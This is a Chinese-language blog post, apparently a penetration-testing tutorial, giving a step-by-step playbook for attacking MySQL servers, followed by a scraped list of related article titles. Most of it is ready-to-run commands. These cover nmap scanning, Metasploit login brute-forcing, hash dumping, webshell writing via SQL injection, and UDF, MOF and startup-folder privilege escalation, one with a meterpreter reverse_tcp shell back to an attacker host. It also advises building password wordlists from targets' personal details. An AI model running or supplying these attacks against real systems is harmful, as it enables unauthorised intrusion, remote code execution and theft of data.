目录

一、渗透攻击MySQL

1.1、第一步:信息收集

db_nmap扫描(内置、外置都可)

Metasploit模块

sqlmap

1.2、第二步:获取服务器权限(爆破)

MySQL 口令爆破

哈希值爆破

泄露的源码中寻找数据库密码

向服务器写WebShell

1.3、第三步:提权

UDF提权(UDF提权)

Mof提权

MySQL启动项提权

1.4、第四步:MySQL 0day 漏洞


一、渗透攻击MySQL

1.1、第一步:信息收集

db_nmap扫描(内置、外置都可)

目标发现-iL        #添加扫描ip列表文件
-iR        #随机选择目标#不用指定目标ip,nmap对全球的ip随机选择100个进行扫描
--exclude  #排除扫描
主机发现-sn     #ping扫描,不扫描端口
-Pn     #完全扫描(穿透防火墙)
-PS/PA/PU/PY[portlist]   #协议扫描,TCP、SYN/ACK、UDP、SCTP ,基于上述协议扫描端口
-PO[protocol list]       #使用ip协议扫描
-n/-R
-n:   #不进行nds解析
-R:   #对其进行反向解析
--dns-servers    #更换DNS服务器为得到不同的扫描结果
--traceroute     #路由追踪,等同于traceroute命令
端口发现-sS/sT/sA/sW/sM   #基于TCP的端口发现(SYN全连接 ACK窗口 Maimon扫描)
-sU         #基于UPD协议的扫描,但是UDP的扫描的准确率并不高
-sN/sF/sX   #基于TCP的空/finish/xmas的扫描
--scanflags <flags>  #对TCP的扫描,是对tcpflags位的组合,可以自定义组合
-sI         #僵尸扫描
-sY/sZ      #基于SCTP协议(少用)
-b          #基于FTP的中继扫描
端口和扫描菜单-p     #扫描特定类型端口/范围
--exclude-ports  #排除不需扫描的端口范围
-F     #快速扫描
-r     #按顺序扫描
namp默认每次扫描中随机选择(常用端口的top n),-r会使namp按照从大到小的顺序进行
服务/版本探测-sV
--version-intensity
--version-trace
对扫描过程进行跟踪,显示扫描的具体过程

Metasploit模块

 #获取MySQL相关信息
auxiliary/admin/mysql/mysql_enum
auxiliary/scanner/mysql/mysql_version#文件枚举和目录可写信息枚举
auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_writable_dirs

sqlmap

通过注入点利用,获取数据库相关信息

1.2、第二步:获取服务器权限(爆破)

如果目标服务器开启3389端口,并且允许远程访问,可以采取爆破MySQL用户密码,获取MySQL的权限

MySQL 口令爆破

爆破成功的几率很低几乎为零,除非管理员用的是弱口令。通过社工可以提高一定成功率,通过收集各种信息,例如姓名、社交平台账号/昵称、手机号、生日、伴侣姓名/生日、职业等信息,通过信息生成针对性的字典,利用该字典进行爆破

1、metasploit相关模块爆破use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.x.x
set pass_file /tmp/wordlists.txt    # 设置字典
set username root
run
2、nmap扫描并破解nmap --script=mysql-brute.nse <ip> -p 3306自定义账号、密码
nmap  --script=mysql-brute.nse userdb=/tmp/passdb.txt passdb=/tmp/pass.txt 192.168.1.13 -p 3306检查mysql root空口令
nmap --script=mysql-empty-password.nse <ip>

哈希值爆破

auxiliary/scanner/mysql/mysql_hashdump导出在当前登陆用户权限下可以查看账户的密码hash

泄露的源码中寻找数据库密码

网站的配置文件中大多含有数据库的连接配置,如数据库用户名、密码等配置信息eg:config  connect等

向服务器写WebShell

前提:存在sql注入漏洞、当前用户具有写入权限、目标网站Web物理路径、secure_file_priv 选项支持数据导出高版本的MYSQL添加了secure_file_priv,对导出文件做了限制:1、输出目录路径应该secure_file_priv值一致,才能导出。2、若其值为空,则无限制。3、值为 NULL 时,表示不允许导入或导出

1.3、第三步:提权

UDF提权(UDF提权)

use exploit/multi/mysql/mysql_udf_payload
set rhosts 192.168.x.x
set username root
set password root
runMSF会将一个随机命名的UDF文件写入lib/plugin目录下(该目录不存在,则无法成功),该UDF文件中包含sys_exec()和sys_eval()这两个函数,但是默认只创建sys_exec()函数,该函数执行不会有回显。
可以手动引入 sys_eval() 函数,来执行有回显的命令
create function sys_eval returns string soname 'guuHCUiK.dll';

Mof提权

exploit/windows/mysql/mysql_mof

MySQL启动项提权

use exploit/windows/mysql/mysql_start_up
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.x.x
set lport 4444
set rhosts x.x.x.x
set username root
set password root
set startup_folder xxx     # 根据目标系统进行设置自启目录
run

1.4、第四步:MySQL 0day 漏洞

网上查询了去利用

【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程相关推荐

  1. 蓝牙App系列漏洞原理分析与漏洞利用

    蓝牙App系列漏洞原理分析与漏洞利用 作者: heeeeen 本文系转载,目的是学习,如有侵权,请联系删除 转载出处:http://www.ms509.com/ 蓝牙App漏洞系列分析之一CVE-20 ...

  2. Metasploit 渗透测试手册第三版 第三章 服务端漏洞利用(翻译)

    第三章 服务端漏洞利用 在本章中,我们将学习以下内容 1.攻击Linux服务器 2.SQL注入攻击 3.shell类型 4.攻击Windows服务器 5.利用公用服务 6.MS17-010 永恒之蓝 ...

  3. Kali Linux 秘籍 第六章 漏洞利用

    第六章 漏洞利用 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 一旦我们完成了漏洞扫描步骤,我们就了解了必要的知识 ...

  4. metasploit 快速入门(三) 服务端漏洞利用

    目录 简介 01 攻击Linux服务器 02 SQL 注入 03 shell类型 04 攻击Windows 服务器 05 利用公用服务 06 MS17-010 永恒之蓝 SMB远程代码执行Window ...

  5. 漏洞利用(CVE-2017-5638)

    **实验准备:**一台Kali主机(攻击机),一台ubuntu主机(靶机),Ubuntu中包含docker,并包含vulhub/struts2:2.3镜像 一.开启Ubuntu,将容器8080映射88 ...

  6. MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

    漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:19 ...

  7. MSF以及Samba漏洞利用

    文章目录 MSF以及Samba漏洞利用 一.Metasploit简介 1.1MSF启动 1.2问题报错 1.2.1及时更新源 1.2.2下载数据库 二.Metasploit基础 2.1专业术语 2.2 ...

  8. msfconsole漏洞利用流程

    # 一.阶段划分: 漏洞利用分为 前期交互   情报搜集 威胁建模  漏洞分析  .渗透利用  后渗透利用 报告 这几个阶段 ##  1.前期交互阶段: 与客户组织进行交互讨论,确定范围,目标等 这个 ...

  9. Chrome 0 day漏洞利用链

    远程代码执行漏洞利用 所有的攻击活动都是通过Chrome浏览器执行的.虽然研究人员无法获取漏洞利用的JS代码,但是研究人员根据相关攻击活动的时间轴推测出了利用的漏洞--CVE-2021-21224.此 ...

  10. 被玩坏的IE浏览器——漏洞利用方法和技巧介绍

    0x01 基本介绍 自1995年以来,Internet Explorer一直是Microsoft Windows操作系统的核心部分.尽管正式停止了对Edge浏览器的进一步开1发,但由于其持续使用的情况 ...

最新文章

  1. STC89C52单片机 独立键盘
  2. 第3章 IP寻址
  3. 菜鸟之2011-2012学年总结
  4. springboot使用PageHelper实现分页
  5. Ibatis - Open quote is expected for attribute {1} associated with an element type '
  6. 【干货】人人都能看懂的LSTM
  7. 微信公众号开发--微信JS-SDK扫一扫功能
  8. Hive数据导出的几种方式
  9. python 开发工具_Python开发工具之神兵利器
  10. 有状态容器实践:k8s集成ceph分布式存储
  11. 论文笔记_S2D.68_深度补全网络
  12. java invokevirtual_Java | 深入理解方法调用的本质(含重载与重写区别)
  13. github 安装浏览器导航插件Octotree
  14. 教你给视频添加马赛克的剪辑技巧,轻松简单
  15. html drag 例子,html5 drag事件用法
  16. STM32 三极管继电器驱动电路设计
  17. 学java进美团_美团实习Java岗面经,已拿offer
  18. win10 手动下载升级 Powershell terminal
  19. jquery——淡入淡出(fadein与fadeout)
  20. php 微信开发 网页授权登录,微信开发网页授权登录——2018年6月2日

热门文章

  1. 跟着狂神学Docker(精髓篇)
  2. git 进阶 (四)变基提交
  3. 我的大学六年(郭天祥原创)
  4. flstudio软件怎么设置中文语言切换?
  5. 常见分布式算法的介绍
  6. 华为鸿蒙系统支持19款机型 有你的手机吗,华为鸿蒙OS再生变数,首批只有19款机型可升级,有你的手机吗?...
  7. Leetcode|MySQL|数据库刷题记录(601~627)
  8. 自媒体推广应该怎么入手,如何去做
  9. PRA是个啥?老板表示很满意!
  10. (HBuilder X) 从下载HBuilderX到生成app.apk